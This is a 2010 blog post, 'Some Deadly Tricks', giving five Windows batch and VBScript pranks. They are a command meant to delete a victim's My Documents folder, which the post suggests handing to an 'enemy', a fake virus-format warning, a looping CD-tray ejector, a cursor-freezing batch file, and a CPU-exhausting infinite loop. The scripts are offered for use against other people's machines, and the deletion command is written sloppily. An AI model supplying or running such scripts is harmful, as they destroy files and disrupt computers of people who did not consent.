Popular Posts

Some Deadly Tricks ! Read Carefully!

Posted: Saturday, October 9, 2010 by Fyaz Ahmad in
0


Trick 1 :
Delete my document :

A WAY TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE'S WHAT U SHOULD DO.

rmdir C:\Documents and Settings \S\Q.

OPEN NOTEPAD AND COPY-PASTE THE ABOVE CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.

Trick 2 :

Open notepad and type the code below:

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Then save it as Virus.VBS
note : this one is not harmful just to scare you

Trick 3 :
here is the code of a virus
which will open and close your cdrom copy paste code inside equals in notepad
=========================================
'code start from here

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

'code end from here
=========================================

save it as virus.vbs and double click it
and if u want to close it just open task manager and end wscript.exe


Trick 4 :

@echo off
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE


open notepad and save it as anyname.bat
this will stop your mouse cursor
to fix it log off your pc


Trick 5 :
Note this one is best trick to slow down pc

open notepad
type

do
loop


save it as anyname.vbs

and click on it once twice thrice anytime to make pc too slow .
Open task managar you can see 100% CPU usage . to restore to normal close all wscript.exe from task manager .

0 comments:

Related Posts with Thumbnails